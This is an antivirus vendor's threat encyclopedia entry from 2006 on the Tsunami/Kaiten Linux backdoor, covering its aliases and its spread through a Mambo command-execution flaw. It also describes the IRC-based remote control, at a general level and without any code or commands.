Malware type: Elf Executable

Aliases: Backdoor.Linux.Tsunami.w (Kaspersky), Linux/BackDoor !! (McAfee), Linux.Backdoor.Kaiten (Symantec), BDS/Katien.R (Avira), Troj/Kaiten-Gen (Sophos), Backdoor:Linux/Tsunami.W (Microsoft)

In the wild: Yes

Destructive: No

Language: English

Platform: Linux

Encrypted: No

Description: 

To get a one-glance comprehensive view of the behavior of this executable Linux file, refer to the Behavior Diagram shown below.

Malware Overview

This malicious executable Linux file (ELF) may be downloaded on the affected system by the malware detected by Trend Micro as UNIX_DLOADER.A. It may also be dropped by another malware via a known vulnerability in Mambo. Mambo is an open source content management system commonly used in Linux platforms.

Mambo contains a flaw that may allow a remote attacker to execute arbitrary commands. The problem is that a script function does not validate certain variables, which can be changed to include and execute code from a remote location. It is possible that the flaw may allow a remote attacker to execute arbitrary commands resulting in a loss of integrity.

More information regarding the mentioned vulnerability may be found on the following Web page:

Mambo Function.php Arbitrary Command Execution

Upon execution, this malicious executable Linux file connects to certain Internet Relay Chat (IRC) servers and joins a specific IRC channel. Once a connection is established, it enables a remote malicious user to issue certain commands on the system. The said routine gives the remote malicious user virtual control over the affected system, thus compromising system security.

For additional information about this threat, see:
Solution
Technical Details

Description created: Jun. 4, 2006 3:51:03 PM GMT -0800

Search a new malware

Tell us how we did. Take our quick survey.